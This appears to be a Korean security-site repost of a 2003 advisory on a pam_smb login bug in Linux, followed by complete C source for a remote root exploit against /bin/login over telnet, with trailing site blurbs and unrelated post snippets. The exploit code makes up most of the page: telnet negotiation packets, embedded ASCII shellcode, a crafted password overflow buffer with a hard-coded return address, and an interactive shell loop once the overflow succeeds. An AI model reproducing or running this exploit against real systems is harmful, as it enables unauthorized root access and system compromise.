발표날짜 : 2003.08.31
해당 시스템 : 리눅스
공격유형 : 원격
위험도 : 상
문제점 : 리눅스 pam_smb 에서 로그인 버그가 발견되었다.
원격에서 루트를 따낼 수 있으며 레드햇 8.0,
9.0 에서 성공리에 테스트 되었다.
공격법 / 공격용 소스코드 :
/*
* Linux pam_lib_smb <
1.1.6 /bin/login exploit
* by vertex
*
* Tested on Redhat 8.0,
9.0
*
* greet: nergal, ipxodi.
*
* Advisory at
* http://us2.samba.org/samba/ftp/pam_smb/
*
*
code based on : UC_login.c
* SunOS 5.6,5.7,5.8 remote /bin/login root
exploit
* [mikecc/unixclan]
*
*
=============================================================
* In order to
use pam_lib_smb, need to add following line on top
* of /etc/pam.d/login
*
* auth required /lib/security/pam_smb_auth.so
*
* And config
the /etc/pam_smb.conf correctly.
*
*/
#include
<stdio.h>
#include <string.h>
#include
<stdlib.h>
#include <arpa/inet.h>
#include
<arpa/telnet.h>
#include <sys/socket.h>
#include
<sys/types.h>
#include <netdb.h>
#include
<unistd.h>
#include <getopt.h>
/* first negotiate */
/*
packet capture by ethereal */
char packet_1[] = {
0xff, 0xfd, 0x03, 0xff,
0xfb, 0x18, 0xff, 0xfb,
0x1f, 0xff, 0xfb, 0x20, 0xff, 0xfb, 0x21, 0xff,
0xfb, 0x22, 0xff, 0xfb, 0x27, 0xff, 0xfd, 0x05,
0xff, 0xfb, 0x23
};
char packet_2[] = {
0xff, 0xfa, 0x1f, 0x00, 0x62, 0x00, 0x22, 0xff,
0xf0, 0xff, 0xfa, 0x20, 0x00, 0x33, 0x38, 0x34,
0x30, 0x30, 0x2c, 0x33,
0x38, 0x34, 0x30, 0x30,
0xff, 0xf0, 0xff, 0xfa, 0x23, 0x00, 0x6c, 0x69,
0x64, 0x73,
/* in between ,adding sc */
0x3a, 0x30, 0xff, 0xf0,
0xff, 0xfa,
0x27, 0x00, 0x03, 0x58, 0x41, 0x55, 0x54, 0x48,
0x4f, 0x52,
0x49, 0x54, 0x59, 0x01, 0x2f, 0x68,
0x6f, 0x6d, 0x65, 0x2f, 0x78, 0x69,
0x65, 0x2f,
0x2e, 0x58, 0x61, 0x75, 0x74, 0x68, 0x6f, 0x72,
0x69, 0x74,
0x79, 0x00, 0x44, 0x49, 0x53, 0x50,
0x4c, 0x41, 0x59, 0x01,
};
char packet_2_1[]={
0x6c, 0x69, 0x64, 0x73,
0x3a, 0x30,
0xff, 0xf0, 0xff, 0xfa, 0x18, 0x00,
0x58, 0x54, 0x45, 0x52, 0x4d, 0xff, 0xf0
};
/* here is the TERM value */
/*
*/
void
login(int);
void negotiate(int);
void sendstr(int,char *,int);
void
wont(int sd,int opt);
void will(int sd,int opt);
void cmd(int sd,int
opt);
/* ascii shellcode by shellforge (by phillipe biodi)*/
unsigned
char sc[]
=
"hAAAAX5AAAAHPPPPPPPPahA000X5nCX0PhA004X5nRYZPh0A"
"DAX5owxnPTYI19II19h0200X5U9knPTYII19I19hA000X5sO"
"kBPTY19I19I19h4000X59cF4PTY19II19I19h0000X5000FP"
"TY19I19h0002X500w9PTYI19I19h0A00X5uR00PTYII19I19"
"h04AAX5ByVyPTY19II19I19h600AX59FMVPTY19I19I19h00"
"0AX500LZPTY19II19h00E0X5Btz0PTYII19hA4A0X5R8p9PT"
"Y19I19II19h0D20X5Lx8LPTY19h0000X5000kPh00A0X5fcV"
"0PTYI19I19h00B0X5eFXgPTYI19II19\xff\xff\xe4";
int
main(int argc,char **argv)
{
struct sockaddr_in sock;
struct hostent
*pHe;
int sd;
short port = -1;
int x;
char *host = NULL;
char
*user = NULL;
char exp[1024];
int a;
char *default_port =
"23";
printf("linux_pam_smb\n");
printf("Linux lib_pam_smb < 1.1.6
/bin/login remote exploit\n");
printf("[vertex//lids/org]\n\n");
if (argc
< 2)
{
printf("%s -h <victim> [-p port] \n",argv[0]);
return
0;
}
while ((a = getopt(argc,argv,"h:p:u:")) != -1)
{
switch (a)
{
case 'h':
host = optarg;
break;
case 'p':
port =
atoi(optarg);
break;
default:
printf("[-] invalid
option.\n");
break;
}
}
if (host == NULL)
{
printf("[-] must
specify a host to attack\n");
return 0;
}
if (port < 0)
port =
atoi(default_port);
if ((pHe = gethostbyname(host)) ==
NULL)
{
printf("Host lookup error.\n");
return 0;
}
printf("[*]
attacking %s:%d\n",host,port);
printf("[*] opening socket\n");
if ((sd =
socket(AF_INET,SOCK_STREAM,0)) == -1)
{
printf("[-] could not create
socket");
return 0;
}
sock.sin_family = AF_INET;
sock.sin_port =
htons(port);
memcpy(&sock.sin_addr.s_addr,pHe->h_addr,pHe->h_length);
if
((connect(sd,(struct sockaddr *)&sock,sizeof(sock))) ==
-1)
{
printf("[-] failed to connect to %s\n",host);
return
0;
}
printf("[*] connected!\n");
printf("[*] Begin negotiate...
\n");
negotiate(sd);
printf("[*] Login... \n");
login(sd);
return
0;
}
void login(int sd)
{
char buf[1024];
char
exploit_buf[172];
char cx[3]="\r\n\0";
int x;
fd_set
rset;
memset(exploit_buf,'\0',172);
/* let's jump to 0xbffffe30
*/
/* eb 30 fe ff bf */
x = 0;
exploit_buf[x++]=0x68;
/* push
0xbffffe30 */
/* shellcode address
*/
exploit_buf[x++]=0x30;
exploit_buf[x++]=0xfe;
exploit_buf[x++]=0xff;
exploit_buf[x++]=0xff;
exploit_buf[x++]=0xff;
exploit_buf[x++]=0xbf;
exploit_buf[x++]=0xbf;
/*
ret
*/
exploit_buf[x++]=0xc3;
memset(exploit_buf+x,'A',150);
x+=150;
/*
will jmp in the middle of the NOP */
/* overwrite the eip with 0x40000f4f
libc-2.3.2 */
/* at this address it is
pop $exx
pop $exx
ret
*/
exploit_buf[x++]=0xb5;
exploit_buf[x++]=0xd4;
sleep(2);
memset(buf,'\0',sizeof(buf));
strcpy(buf,
"xie\r\n\0");
printf("[*] sending username
\n");
sendstr(sd,buf,strlen(buf));
sleep(1);
printf("[*] sending
password\n");
sleep(2);
memset(buf,'\0',sizeof(buf));
strcpy(buf,
exploit_buf);
strcat(buf,"\r\n\0");
sendstr(sd,buf,strlen(buf));
sleep(2);
fflush(stdout);
FD_ZERO(&rset);
while
(1)
{
FD_SET(sd,&rset);
FD_SET(0,&rset);
select(sd+1,&rset,0,0,0);
if (FD_ISSET(sd,&rset))
{
memset(buf,'\0',sizeof(buf));
if ((x = read(sd,buf,sizeof(buf)-1))
== 0)
{
printf("Connection closed by foreign
host.\n");
exit(-1);
}
fprintf(stderr,"%s",buf);
}
if
(FD_ISSET(0,&rset))
{
memset(buf,'\0',sizeof(buf));
if ((x =
read(0,buf,sizeof(buf)-1)) > 0)
{
write(sd,buf,x);
}
}
}
}
/*
* telnet negotiation needed for
* talking with the telnet
protocol
*/
void negotiate(int sd)
{
char buf[1024];
char
nop[64];
int len;
sendstr(sd,
packet_1,sizeof(packet_1));
sleep(2);
memset(buf,'\0',sizeof(buf));
memset(nop,'A',sizeof(nop));
memcpy(buf,packet_2,sizeof(packet_2));
/*
adding NOP */
memcpy(buf+sizeof(packet_2), nop, sizeof(nop));
/* shellcode
*/
memcpy(buf+sizeof(packet_2)+sizeof(nop), sc, sizeof(sc));
/* left
packet
*/
memcpy(buf+sizeof(packet_2)+sizeof(nop)+sizeof(sc),packet_2_1,sizeof(packet_2_1));
len
= sizeof(packet_2) +sizeof(packet_2_1) + sizeof(nop)+sizeof(sc) ;
sendstr(sd,
buf, len);
sleep(1);
/* wont echo
*/
wont(sd,TELOPT_ECHO);
sleep(1);
/* do echo
*/
cmd(sd,TELOPT_ECHO);
sleep(2);
}
/*
* send a telnet
WONT
*
* structure of a telnet WONT is:
* 1. IAC
* 2. WONT
* 3.
what you wont do
* (all of the above are found in
arpa/telnet.h)
*/
void wont(int sd,int opt)
{
char
buf[3];
sprintf(buf,"%c%c%c",IAC,WONT,opt);
write(sd,buf,3); /* no error
checking, uh-oh! */
}
/*
* send a telnet WILL
*
* structure
of a telnet WILL is:
* 1. IAC
* 2. WILL
* 3. what you will do
*
(all of the above are found in arpa/telnet.h)
*/
void will(int sd,int
opt)
{
char
buf[3];
sprintf(buf,"%c%c%c",IAC,WILL,opt);
write(sd,buf,3); /* no error
checking, uh-oh! */
}
void cmd(int sd,int opt)
{
char
buf[3];
sprintf(buf,"%c\xfd%c",IAC,opt);
write(sd,buf,3); /* no error
checking, uh-oh! */
}
/*
*
*/
void sendstr(int sd,char *str,int
length)
{
write(sd,str,length);
sleep(1);
}
실용적인 디지털 포렌식 기법과 법률 이슈 정리. Linux, UNIX, Python, 임베디드 장치 개발 등의 강좌 수록. Blockchain, FinTech, IoT 등 최신 IT 트렌드와 관련된 취미 자료를 수집하고, 보안 인식 문화 개선을 위한 정보보호 관련 자료와 일상생활 팁들을 소개.
홈페이지 jQuery 라이브러리에서 CVE-2019-11358 취약점 패치 여부 확인 방법
현재 홈페이지에서 사용 중인 jQuery 라이브러리가 CVE-2019-11358 취약점 패치를 적용했는지 확인하는 방법은 다음과 같습니다. 1. jQuery 버전 확인 홈페이지 소스 코드를 확인하여 jQuery 라이브러리 버전을 직접 확인합니다. 웹 ...
-
뉴스출처 : http://news.naver.com/main/read.nhn?mode=LSD&mid=sec&oid=023&aid=0002991158&sid1=001 내 배우자가 바람을 피우는 것이 확실할까. 심증...
-
PHPSCHOOL ( http://www.phpschool.com ) 국내 1위의 PHP 개발자 커뮤니티 사이트이다. PHP Builder ( http://www.phpbuilder.com ) PHP 최고 사이트라고 해도 과언이 아니며, 새로운 P...